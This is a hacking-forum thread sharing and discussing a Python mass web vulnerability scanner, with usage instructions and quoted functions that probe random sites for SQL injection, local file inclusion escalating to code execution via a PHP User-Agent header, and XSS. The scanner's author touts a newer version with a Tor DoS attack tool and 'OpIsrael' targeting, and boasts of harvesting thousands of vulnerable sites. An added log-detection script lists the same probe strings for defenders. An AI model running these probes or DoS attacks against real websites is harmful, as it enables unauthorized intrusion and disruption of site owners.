Author Topic: One of the best website vulnerability scanners + tutorial  (Read 14499 times)


DrSyba
One of the best website vulnerability scanners + tutorial
« on: March 02, 2013, 05:39:49 pm »

Source Code: Get It Here


Instructions:






Windows:


Download Python




Once installed, make a new text document, get the source code for the scanner, and copy paste it inside the text document. Then click file > save as > scanner.py > save




Next open CMD, navigate to the directory of the file, once there, type scanner.py.


Scan any website you want, or press enter to scan random websites. For good results, use 20+ threads, 100+ dorks, and 10+ pages.


Linux:


(Sorry, no images)


Copy the source code into a file and save it as scanner.py.


Open terminal and navigate to the location of the file.


Then type: python scanner.py



Scan any website you want, or press enter to scan random websites. For good results, use 20+ threads, 100+ dorks, and 10+ pages.

Pak_Track
« Reply #1 on: March 02, 2013, 07:56:47 pm »
Thanks for the share but most of us have used this software...

'Life is but a series of conflicts between the easy way and the right way.'
The more you know, the more you'll realize you know nothing. -Snayler
The problem with being a smart motherfucker is that sometimes the stupid motherfuckers think you're a crazy motherfucker.
dont u hate it when you offer help and the other person says yes -Pakalu Papito

techb
« Reply #2 on: March 02, 2013, 08:29:21 pm »
So EASY A CAVEMAN CAN DO IT!

I give you a -C for effort I guess.
>>>import this
-----------------------------

condexx
« Reply #3 on: March 04, 2013, 05:18:03 pm »
It is good to see the work of our darkc0de community still around!

EMOKDOOM
« Reply #4 on: March 11, 2013, 07:24:57 am »
Alright, I feel dumb, but I can't get this to work.
I honestly googled the shit out of this and tried tackling it in a few different ways, but I did it the EXACT way you say.

-Save file through IDLE as scanner.py
-Navigate to /home/'username'/Documents/python as that's where I saved it
-In terminal run: python scanner.py but I get an error message: python: can't open file 'scanner.py': [Errno 2] No such file or directory

I'm where the file is. Still novice to Python but it seems straightforward so I'm asking for help. Running Fedora in case it matters.

Is it possible that I have to go through the code and put >>> before every function def?



« Last Edit: March 11, 2013, 07:26:53 am by EMOKDOOM »

aichi
« Reply #5 on: March 11, 2013, 07:29:45 am »
Code: [Select]
def ClassicINJ(url):
    EXT = "'"
    host = url+EXT
    try:
        source = urllib2.urlopen(host).read()
        for type,eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
                logfile.write("\n"+host)
                vuln.append(host)
                col.append(host)
                break
            else:
                pass
    except:
        pass

This should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

Code: [Select]
def ClassicLFI(url):
    lfiurl = url.rsplit('=', 1)[0]
    if lfiurl[-1] != "=":
        lfiurl = lfiurl + "="
    for lfi in lfis:
        try:
            check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
            if re.findall("root:x", check):
                print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
                lfi_log_file.write("\n"+lfiurl+lfi)
                vuln.append(lfiurl+lfi)
                target = lfiurl+lfi
                target = target.replace("/etc/passwd","/proc/self/environ")
                header = "<? echo md5(baltazar); ?>"
                try:
                    request_web = urllib2.Request(target)
                    request_web.add_header('User-Agent', header)
                    text = urllib2.urlopen(request_web)
                    text = text.read()
                    if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
                        print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
                        rce_log_file.write("\n",target)
                        vuln.append(target)
                except:
                    pass
        except:
            pass

The LFI tester (above) only works on UNIX based systems. You can see they tried to break out the GET params, but it's kinda ugly. I also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.

Code: [Select]
def ClassicXSS(url):
    for xss in xsses:
        try:
            source = urllib2.urlopen(url+xss.replace("\n","")).read()
            if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source):
                print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
                xss_log_file.write("\n"+url+xss)
                vuln.append(url+xss)
        except:
            pass

The XSS checker (above) can be hugely expanded, plus what about content filtering? Eh, this isn't very reliable. The SQL scanners are ok, probably the best part of the whole scanner. Nice code, but I think they have become lazy.
-- silence is not a virtue
http://aichi-ninja.blogspot.com/
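
Added example (not part of any post in this thread, and not code from the scanner): the fixed strings in the excerpts quoted above also make the scanner's requests easy to recognise on the receiving side. The sketch below flags them in web server access logs. It assumes Combined Log Format; the rule names, sample log lines, IP addresses and paths are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined Log Format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)

# Rule names are made up for this example; the matched strings come from the
# quoted ClassicINJ / ClassicLFI / ClassicXSS excerpts.
RULES = [
    ("sqli-quote-probe", "target", re.compile(r"\?.*'$")),  # url + "'"
    ("lfi-passwd-probe", "target", re.compile(r"\?.*etc/passwd")),
    ("lfi-environ-probe", "target", re.compile(r"\?.*proc/self/environ")),
    ("php-in-user-agent", "ua", re.compile(r"<\?")),  # PHP open tag sent as UA
    ("xss-marker", "target", re.compile(r"XSS by (?:baltazar|NovaCygni)")),
]

def classify(line):
    """Return (client_ip, [rule names hit]), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode once so %27 and + are compared in their literal form.
    fields = {"target": unquote_plus(m.group("target")), "ua": m.group("ua")}
    return m.group("ip"), [n for n, f, rx in RULES if rx.search(fields[f])]

def scan(lines):
    """Aggregate rule hits per client IP, skipping clean and unparsable lines."""
    hits = defaultdict(set)
    for line in lines:
        result = classify(line.strip())
        if result and result[1]:
            hits[result[0]].update(result[1])
    return {ip: sorted(names) for ip, names in hits.items()}

# Constructed sample log lines (documentation IP ranges, made-up paths).
TS = "[11/Mar/2013:07:29:45 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {TS} "GET /item.php?id=12%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - {TS} "GET /view.php?page=../../etc/passwd%00 HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - {TS} "GET /view.php?page=../../proc/self/environ HTTP/1.1" 200 88 "-" "<? echo md5(baltazar); ?>"',
    f'198.51.100.7 - - {TS} "GET /search.php?q=%3Cb%3EXSS+by+baltazar%3C/b%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /item.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'192.0.2.11 - - {TS} "GET /search.php?q=o%27brien&page=2 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]
```

A legitimate query whose last value ends in an apostrophe would also trip the first rule, so it is better treated as a signal to correlate with the others than as a verdict on its own.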

kenjoe41
« Reply #6 on: March 13, 2013, 12:47:14 am »
Quote
one of the best website scanner
This code is really buggy and I can bet it needs a lot of editing work. Good luck with it.
« Last Edit: March 13, 2013, 02:30:42 am by kenjoe41 »
If you can't explain it to a 6 year old, you don't understand it yourself.

Bulldogslaxman
« Reply #7 on: April 02, 2013, 11:18:29 pm »
Whenever I run this I get an error

NovaCygni
« Reply #8 on: April 20, 2013, 04:33:13 pm »
Quote
Code: [Select]
def ClassicINJ(url):
    EXT = "'"
    host = url+EXT
    try:
        source = urllib2.urlopen(host).read()
        for type,eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
                logfile.write("\n"+host)
                vuln.append(host)
                col.append(host)
                break
            else:
                pass
    except:
        pass

This should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

Code: [Select]
def ClassicLFI(url):
    lfiurl = url.rsplit('=', 1)[0]
    if lfiurl[-1] != "=":
        lfiurl = lfiurl + "="
    for lfi in lfis:
        try:
            check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
            if re.findall("root:x", check):
                print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
                lfi_log_file.write("\n"+lfiurl+lfi)
                vuln.append(lfiurl+lfi)
                target = lfiurl+lfi
                target = target.replace("/etc/passwd","/proc/self/environ")
                header = "<? echo md5(baltazar); ?>"
                try:
                    request_web = urllib2.Request(target)
                    request_web.add_header('User-Agent', header)
                    text = urllib2.urlopen(request_web)
                    text = text.read()
                    if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
                        print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
                        rce_log_file.write("\n",target)
                        vuln.append(target)
                except:
                    pass
        except:
            pass

The LFI tester (above) only works on UNIX based systems. You can see they tried to break out the GET params, but it's kinda ugly. I also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.

Code: [Select]
def ClassicXSS(url):
    for xss in xsses:
        try:
            source = urllib2.urlopen(url+xss.replace("\n","")).read()
            if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source):
                print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
                xss_log_file.write("\n"+url+xss)
                vuln.append(url+xss)
        except:
            pass

The XSS checker (above) can be hugely expanded, plus what about content filtering? Eh, this isn't very reliable. The SQL scanners are ok, probably the best part of the whole scanner. Nice code, but I think they have become lazy.


This version is MASSIVELY outdated, it's a V.0.0.1 release... a Beta Release at that, I'm on Version V.3.0.2 at the moment ;o I've stopped all work on it though as the IRC I was part of is no longer fit for purpose so I've left and "Retired" from the scene until I can find a new home.



# V3n0MScanner.py - V.3.0.2
#    -Increased headers list to include mobile devices headers
#    -Increased XSS Detection by almost double, Detects Actual Bypass required for the attack to progress
#    -Increased LFI Detection rates
#    -Increased URL Detection rate for valid Vuln sites
#    -New Banner Style promoting V3n0M Scanner and Version details
#    -New method for identifying Version make: V.x.y.z Where x is the main release version, y is amount of Beta release versions and z is the
#     amount of alpha release versions. ie, V.3.0.2 is Main release build 3 that has had 0 Beta test phases and 2 Alpha release phases
#    -New Search Engine's powering the scanner so should give alot more results.
#    -Intergrated DoS Feature, now you can select to [1] Scan as you used to for vulnerabilitys or [2] TorSledgehammer DoS Attack
#    -New MultiPlatform version instead of the old Linux/Windows seperate releases
#    -TorSledgehammer DoS tool rotates attacks through multiple detected Internet connections to spread attack workload and increase DoS success rate.
#    -Added Israeli SearchEngines for increasing "Hit" ratio for "OpIsrael" scans.

Please Note I do NOT support AnonSet anymore, the IRC's admin has no interest in protecting the safety of its members and frankly is unfit emotionally to run an IRC server. Anyone wishing to assist in working on the V3n0M toolkit or provide input please let me know.






*Edit
The Original poster was incorrect, the correct best settings are 100 Threads over ToR or 200 Threads on a normal connection.

Quote
This code is really buggy and I can bet it needs a lot of editing work. Good luck with it.

Beta, says it all :3 and wasn't that much editing really for anyone who understands the basics of Python... Oh and you'll find even the beta version posted by the original poster still worked fine, even if it would give a 15% false positive hit, with an "all dorks scan" on .com you'd still get 25k+ Vuln sites. (* Not to mention the Original Poster posted a Windows only version o.o might explain why some people failed to get it to run lol. *)
« Last Edit: April 20, 2013, 04:52:26 pm by NovaCygni »
We do what we want, Because we can.

kat
« Reply #9 on: April 30, 2013, 06:36:48 pm »
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

kenjoe41
« Reply #10 on: April 30, 2013, 11:28:51 pm »
Quote
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

Nice find but would have posted it in the found it on the web section.

Axon
« Reply #11 on: May 01, 2013, 07:20:09 pm »
Quote
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

The tutorial section is dead.

kenjoe41
« Reply #12 on: May 01, 2013, 08:33:28 pm »
Quote
The tutorial section is dead.

Yeah! I tried it too and like hell all the links were dead plus a few others in other sections.
But all in all I love the Python scripts which I've been playing around with today.